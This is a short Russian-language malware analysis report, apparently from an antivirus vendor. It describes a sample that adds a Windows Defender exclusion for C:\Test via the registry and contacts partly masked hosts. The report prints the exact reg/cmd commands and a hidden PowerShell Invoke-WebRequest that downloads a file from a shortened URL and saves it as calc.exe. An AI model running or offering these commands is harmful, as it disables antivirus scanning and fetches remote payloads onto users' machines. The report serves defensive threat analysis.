Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса с помощью следующих ключей реестра:
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] 'C:\Test' = ''
Сетевая активность
Подключается к
- 'sh##turl.at':443
- 'pk#.goog':80
TCP
Запросы HTTP GET
- http://pk#.goog/gsr1/gsr1.crt
Другие
- 'sh##turl.at':443
UDP
- DNS ASK sh##turl.at
- DNS ASK pk#.goog
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Test" /t REG_SZ /d "" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Test" /t REG_SZ /d "" /f
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Invoke-WebRequest -Uri 'https://shorturl.at/WkvGv' -OutFile '%HOMEPATH%\Downloads\calc.exe'" (со скрытым окном)
